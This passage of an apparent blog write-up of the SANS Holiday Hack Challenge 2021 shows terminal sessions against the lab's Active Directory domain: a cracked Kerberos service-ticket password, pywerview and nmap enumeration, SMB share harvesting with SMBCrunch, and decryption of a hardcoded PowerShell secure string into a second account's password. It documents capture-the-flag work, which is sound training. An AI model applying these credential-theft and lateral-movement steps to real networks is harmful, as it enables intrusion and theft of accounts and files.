&lt;span class="go"&gt;Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])&lt;/span&gt;
&lt;span class="go"&gt;Will run 8 OpenMP threads&lt;/span&gt;
&lt;span class="go"&gt;Press &amp;#39;q&amp;#39; or Ctrl-C to abort, almost any other key for status&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Snow2021!        (?)&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;1g 0:00:00:01 DONE (2022-01-04 12:58) 0.5813g/s 1822Kp/s 1822Kc/s 1822KC/s Sed..karaokebut&lt;/span&gt;
&lt;span class="go"&gt;Use the &amp;quot;--show&amp;quot; option to display all of the cracked passwords reliably&lt;/span&gt;
&lt;span class="go"&gt;Session completed.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The password of account &lt;code&gt;elfu_svc&amp;#64;elfu.local&lt;/code&gt; is &lt;code&gt;Snow2021!&lt;/code&gt;. Hmm,
I feel like I could have found that password without creating a wordlist and
using a custom rule, but it is what it is 🤷‍♂️.&lt;/p&gt;
&lt;p&gt;Anyway, we now have a new account! But where can we use it? Let's ask for a
list of domain computers, using &lt;code&gt;pywerview&lt;/code&gt;'s &lt;code&gt;get-netcomputer&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains pywerview get-netcomputer -t &lt;span class="m"&gt;10&lt;/span&gt;.128.1.53 -u xojpwgcens -p &lt;span class="s1"&gt;&amp;#39;Xuuqgefth#&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:389-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;dnshostname: share30.elfu.local&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;dnshostname: DC01.elfu.local&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hey, share30.elfu.local, that looks like a promising server! But it's not...
The hostname does not resolve (in fact, even DC01.elfu.local does not resolve,
weird). So let's look for other servers. We're looking for a secret document,
so let's look at SMB shares. Since the DC is 10.128.1.53, I first tried
10.128.1.0/24, but I only found the DC in this range. Same for 10.128.1.0/23.
However, I found other servers in the 10.128.1.0/22 range:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;xojpwgcens@grades:~$&lt;/span&gt; nmap -Pn -n -p &lt;span class="m"&gt;445&lt;/span&gt; --open -oG tcp_445_open_10.128.1.0.22.gnmap &lt;span class="m"&gt;10&lt;/span&gt;.128.1.0/22
&lt;span class="go"&gt;Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-04 12:18 UTC&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for 10.128.1.53&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.0012s latency).&lt;/span&gt;

&lt;span class="go"&gt;PORT    STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;445/tcp open  microsoft-ds&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for 10.128.2.3&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00011s latency).&lt;/span&gt;

&lt;span class="go"&gt;PORT    STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;445/tcp open  microsoft-ds&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for 10.128.2.6&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.000084s latency).&lt;/span&gt;

&lt;span class="go"&gt;PORT    STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;445/tcp open  microsoft-ds&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for 10.128.2.7&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.0021s latency).&lt;/span&gt;

&lt;span class="go"&gt;PORT    STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;445/tcp open  microsoft-ds&lt;/span&gt;

&lt;span class="go"&gt;Nmap scan report for 10.128.2.9&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.0015s latency).&lt;/span&gt;

&lt;span class="go"&gt;PORT    STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;445/tcp open  microsoft-ds&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Many SMB servers were found. You can get the &lt;code&gt;.gnmap&lt;/code&gt; file &lt;a class="reference external" href="/docs/sans-christmas-challenge-2021/tcp_445_open_10.128.1.0.22.gnmap"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's explore these SMB servers. To do so, I like to use &lt;a class="reference external" href="https://github.com/Raikia/SMBCrunch"&gt;SMBCrunch&lt;/a&gt;, a collection of Perl scripts:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;SMBHunt&lt;/code&gt; takes a &lt;code&gt;.gnmap&lt;/code&gt; file and credentials, and lists
exposed SMB shares.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SMBList&lt;/code&gt; takes the result from &lt;code&gt;SMBHunt&lt;/code&gt; and credentials, and
lists the content of accessible shares.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SMBGrab&lt;/code&gt; takes result of &lt;code&gt;SMBList&lt;/code&gt; and can download files we
want.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let's launch &lt;code&gt;SMBHunt&lt;/code&gt; with our &lt;code&gt;elfu_svc&amp;#64;elfu.local&lt;/code&gt; account:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains ~/bin/SMBCrunch/SMBHunt.pl -a &lt;span class="s1"&gt;&amp;#39;ELFU.LOCAL\elfu_svc:Snow2021!&amp;#39;&lt;/span&gt; -i ./tcp_445_open_10.128.1.0.22.gnmap --noipc -o hunt_elfu_svc
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;             _____ __  __ ____  _    _             _&lt;/span&gt;
&lt;span class="go"&gt;            / ____|  \/  |  _ \| |  | |           | |&lt;/span&gt;
&lt;span class="go"&gt;           | (___ | \  / | |_) | |__| |_   _ _ __ | |_&lt;/span&gt;
&lt;span class="go"&gt;            \___ \| |\/| |  _ &amp;lt;|  __  | | | | &amp;#39;_ \| __|&lt;/span&gt;
&lt;span class="go"&gt;            ____) | |  | | |_) | |  | | |_| | | | | |_&lt;/span&gt;
&lt;span class="go"&gt;           |_____/|_|  |_|____/|_|  |_|\__,_|_| |_|\__|&lt;/span&gt;


&lt;span class="go"&gt;                            By Chris King&lt;/span&gt;
&lt;span class="go"&gt;                  @raikiasec&lt;/span&gt;


&lt;span class="go"&gt;       Note: This script is for share discovery. It does not guarantee&lt;/span&gt;
&lt;span class="go"&gt;             access to the shares it finds.&lt;/span&gt;


&lt;span class="go"&gt;    Starting enumerating file shares using domain credential for ELFU.LOCAL\elfu_svc&lt;/span&gt;

&lt;span class="go"&gt;\\10.128.1.53\ADMIN$&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.1.53\C$&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.1.53\NETLOGON&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.1.53\SYSVOL&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.25\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.26\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.28\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.30\netlogon&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.30\sysvol&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;\\10.128.3.30\elfu_svc_shr&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;\\10.128.3.30\research_dep&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;\\10.128.3.31\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.34\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.35\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.36\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.38\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.39\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.41\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.42\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.43\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.45\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.46\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.47\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.48\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.49\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.51\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.55\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.56\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.57\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.58\ElfUFiles&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.60\ElfUFiles&lt;/span&gt;

&lt;span class="go"&gt;Done!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Two interesting shares in this list! The first one has the same name as our
account, so we may have access to it. The second one is obviously a share
for the research department, and if you remember our objective, you know we
have to find a research document. It's probably in this share. Let's try to
list both their contents:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat shares_to_list.txt
&lt;span class="go"&gt;\\10.128.3.30\elfu_svc_shr&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.30\research_dep&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; proxychains ~/bin/SMBCrunch/SMBList.pl -c &lt;span class="s1"&gt;&amp;#39;ELFU.LOCAL\elfu_svc:Snow2021!&amp;#39;&lt;/span&gt; -s shares_to_list.txt -o list_elfu_svc
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;

&lt;span class="go"&gt;             _____ __  __ ____  _      _     _&lt;/span&gt;
&lt;span class="go"&gt;            / ____|  \/  |  _ \| |    (_)   | |&lt;/span&gt;
&lt;span class="go"&gt;           | (___ | \  / | |_) | |     _ ___| |_&lt;/span&gt;
&lt;span class="go"&gt;            \___ \| |\/| |  _ &amp;lt;| |    | / __| __|&lt;/span&gt;
&lt;span class="go"&gt;            ____) | |  | | |_) | |____| \__ \ |_&lt;/span&gt;
&lt;span class="go"&gt;           |_____/|_|  |_|____/|______|_|___/\__|&lt;/span&gt;


&lt;span class="go"&gt;                        By Chris King&lt;/span&gt;
&lt;span class="go"&gt;             @raikiasec&lt;/span&gt;

&lt;span class="go"&gt;Share                               Username                            Password                            Progress&lt;/span&gt;
&lt;span class="go"&gt;--------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.30\elfu_svc_shr          ELFU.LOCAL\elfu_svc                 Snow2021!                           Success!&lt;/span&gt;
&lt;span class="go"&gt;\\10.128.3.30\research_dep          ELFU.LOCAL\elfu_svc                 Snow2021!                           Access Denied&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We managed to list the content of share &lt;code&gt;elfu_svc_shr&lt;/code&gt;, but got our
access denied for share &lt;code&gt;research_dep&lt;/code&gt;. Oh well, let's look at the
content of &lt;code&gt;elfu_svc_shr&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; head ./list_elfu_svc/10.128.3.30_elfu_svc_shr
&lt;span class="gp"&gt;#&lt;/span&gt; SHARE INFO:   .                                   D        &lt;span class="m"&gt;0&lt;/span&gt;  Thu Dec  &lt;span class="m"&gt;2&lt;/span&gt; &lt;span class="m"&gt;17&lt;/span&gt;:39:42 &lt;span class="m"&gt;2021&lt;/span&gt;

&lt;span class="go"&gt;ELFU.LOCAL\elfu_svc:Snow2021!|:|\\10.128.3.30\elfu_svc_shr\Get-NavArtifactUrl.ps1&lt;/span&gt;
&lt;span class="go"&gt;ELFU.LOCAL\elfu_svc:Snow2021!|:|\\10.128.3.30\elfu_svc_shr\Get-WorkingDirectory.ps1&lt;/span&gt;
&lt;span class="go"&gt;ELFU.LOCAL\elfu_svc:Snow2021!|:|\\10.128.3.30\elfu_svc_shr\Stop-EtwTraceCapture.ps1&lt;/span&gt;
&lt;span class="go"&gt;ELFU.LOCAL\elfu_svc:Snow2021!|:|\\10.128.3.30\elfu_svc_shr\create-knownissue-function.ps1&lt;/span&gt;
&lt;span class="go"&gt;ELFU.LOCAL\elfu_svc:Snow2021!|:|\\10.128.3.30\elfu_svc_shr\PsTestFunctions.ps1&lt;/span&gt;
&lt;span class="go"&gt;ELFU.LOCAL\elfu_svc:Snow2021!|:|\\10.128.3.30\elfu_svc_shr\StoreIngestionApplicationApi.ps1&lt;/span&gt;
&lt;span class="go"&gt;ELFU.LOCAL\elfu_svc:Snow2021!|:|\\10.128.3.30\elfu_svc_shr\Compile-ObjectsInNavContainer.ps1&lt;/span&gt;
&lt;span class="go"&gt;ELFU.LOCAL\elfu_svc:Snow2021!|:|\\10.128.3.30\elfu_svc_shr\Run-ConnectionTestToNavContainer.ps1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A lot of PowerShell files. That's always interesting, because some
administrators like to hardcode credentials in their scripts. When conducting
an internal assessment, I always look for scripts. Let's download them
using &lt;code&gt;SMBGrab&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -E &lt;span class="s1"&gt;&amp;#39;\.ps1$&amp;#39;&lt;/span&gt; ./list_elfu_svc/10.128.3.30_elfu_svc_shr &lt;span class="p"&gt;|&lt;/span&gt; proxychains ~/bin/SMBCrunch/SMBGrab.pl -a -s ps1_files
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;

&lt;span class="go"&gt;             _____ __  __ ____   _____           _&lt;/span&gt;
&lt;span class="go"&gt;            / ____|  \/  |  _ \ / ____|         | |&lt;/span&gt;
&lt;span class="go"&gt;           | (___ | \  / | |_) | |  __ _ __ __ _| |__&lt;/span&gt;
&lt;span class="go"&gt;            \___ \| |\/| |  _ &amp;lt;| | |_ | &amp;#39;__/ _` | &amp;#39;_ \&lt;/span&gt;
&lt;span class="go"&gt;            ____) | |  | | |_) | |__| | | | (_| | |_) |&lt;/span&gt;
&lt;span class="go"&gt;           |_____/|_|  |_|____/ \_____|_|  \__,_|_.__/&lt;/span&gt;


&lt;span class="go"&gt;                     By Chris King&lt;/span&gt;
&lt;span class="go"&gt;               @raikiasec&lt;/span&gt;


&lt;span class="go"&gt;SMBGrab - Chris King&lt;/span&gt;

&lt;span class="go"&gt;...Get-NavArtifactUrl.ps1                    Success&lt;/span&gt;
&lt;span class="go"&gt;...Get-WorkingDirectory.ps1                  Success&lt;/span&gt;
&lt;span class="go"&gt;...Stop-EtwTraceCapture.ps1                  Success&lt;/span&gt;
&lt;span class="go"&gt;...create-knownissue-function.ps1            Success&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It takes a while through the proxy, but we eventually get all PowerShell files.
Let's &lt;code&gt;grep&lt;/code&gt; for passwords:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -i passw ./ps1_files/*
&lt;span class="go"&gt;./ps1_files/10.128.3.30_elfu_svc_shr_AppHandling.ps1:        New-SelfSignedCertificate –Type CodeSigningCert –Subject “CN=FreddyK” | Export-PfxCertificate -FilePath $certFile -Password $Credential.Password&lt;/span&gt;
&lt;span class="go"&gt;./ps1_files/10.128.3.30_elfu_svc_shr_AppHandling.ps1:        Sign-BcContainerApp -containerName $bcContainerName -appFile $bcAppFile -pfxFile $certFile -pfxPassword $Credential.Password&lt;/span&gt;
&lt;span class="go"&gt;./ps1_files/10.128.3.30_elfu_svc_shr_AppHandling.ps1:        Import-PfxCertificateToBcContainer -containerName $bcContainerName -pfxCertificatePath $certFile -pfxPassword $Credential.Password -CertificateStoreLocation &amp;quot;Cert:\LocalMachine\Root&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;./ps1_files/10.128.3.30_elfu_svc_shr_AppHandling.ps1:                            -auth NavUserPassword `&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;./ps1_files/10.128.3.30_elfu_svc_shr_GetProcessInfo.ps1:$SecStringPassword = &amp;quot;76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;One interesting line stands out: a password seems to be defined as a PowerShell
secure string. Let's take a closer look:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nv"&gt;$SecStringPassword&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA&amp;quot;&lt;/span&gt;
&lt;span class="nv"&gt;$aPass&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$SecStringPassword&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;ConvertTo-SecureString&lt;/span&gt; &lt;span class="n"&gt;-Key&lt;/span&gt; &lt;span class="n"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;7&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;7&lt;/span&gt;
&lt;span class="nv"&gt;$aCred&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Management&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Automation&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PSCredential&lt;/span&gt; &lt;span class="n"&gt;-ArgumentList&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;elfu.local\remote_elf&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$aPass&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;Invoke-Command&lt;/span&gt; &lt;span class="n"&gt;-ComputerName&lt;/span&gt; &lt;span class="n"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;128&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;53&lt;/span&gt; &lt;span class="n"&gt;-ScriptBlock&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nb"&gt;Get-Process&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;-Credential&lt;/span&gt; &lt;span class="nv"&gt;$aCred&lt;/span&gt; &lt;span class="n"&gt;-Authentication&lt;/span&gt; &lt;span class="n"&gt;Negotiate&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It seems to be a password for account &lt;code&gt;ELFU.LOCAL\remote_elf&lt;/code&gt;. What's
fun with secure strings is that you can actually recover the plaintext value
they hold. Here's &lt;a class="reference external" href="https://pscustomobject.github.io/powershell/functions/PowerShell-SecureString-To-String/"&gt;a blog post&lt;/a&gt;
explaining how to do so. Let's run it this sample of code on our own machine:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\Users\username&amp;gt; &lt;/span&gt;&lt;span class="nv"&gt;$SecStringPassword&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA&amp;quot;&lt;/span&gt;
&lt;span class="gp"&gt;PS C:\Users\username&amp;gt; &lt;/span&gt;&lt;span class="nv"&gt;$aPass&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$SecStringPassword&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;ConvertTo-SecureString&lt;/span&gt; &lt;span class="n"&gt;-Key&lt;/span&gt; &lt;span class="n"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;7&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;7&lt;/span&gt;
&lt;span class="gp"&gt;PS C:\Users\username&amp;gt; &lt;/span&gt;&lt;span class="no"&gt;[Runtime.InteropServices.Marshal]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;PtrToStringAuto&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[Runtime.InteropServices.Marshal]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;SecureStringToBSTR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$aPass&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;A1d655f7f5d98b10!&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we now have the password of account &lt;code&gt;ELFU.LOCAL\remote_elf&lt;/code&gt;.
Let's study this account:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains pywerview get-netuser -t &lt;span class="m"&gt;10&lt;/span&gt;.128.1.53 -u xojpwgcens -p &lt;span class="s1"&gt;&amp;#39;Xuuqgefth#&amp;#39;&lt;/span&gt; --username remote_elf
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:389-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;objectclass:           top, person, organizationalPerson, user&lt;/span&gt;
&lt;span class="go"&gt;cn:                    Remote Elf User Account&lt;/span&gt;
&lt;span class="go"&gt;sn:                    Service&lt;/span&gt;
&lt;span class="go"&gt;givenname:             ElfU&lt;/span&gt;
&lt;span class="go"&gt;distinguishedname:     CN=Remote Elf User Account,CN=Users,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;instancetype:          4&lt;/span&gt;
